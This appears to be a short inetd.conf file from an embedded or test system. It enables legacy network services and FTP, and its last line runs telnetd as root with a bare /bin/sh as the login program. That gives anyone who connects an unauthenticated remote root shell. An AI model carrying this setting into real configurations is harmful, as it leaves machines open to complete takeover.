# <servicename> <socktype> <proto> <flags> <user> <serverpath> <args>

echo	stream	tcp	nowait	root	internal
discard	stream	tcp	nowait	root	internal
daytime	stream	tcp	nowait	root	internal
time	stream	tcp	nowait	root	internal

ftp	stream	tcp	nowait	root	/usr/sbin/ftpd ftpd -wS /tmp/ftproot 
telnet	stream	tcp	nowait	root	/usr/sbin/telnetd telnetd -l /bin/sh
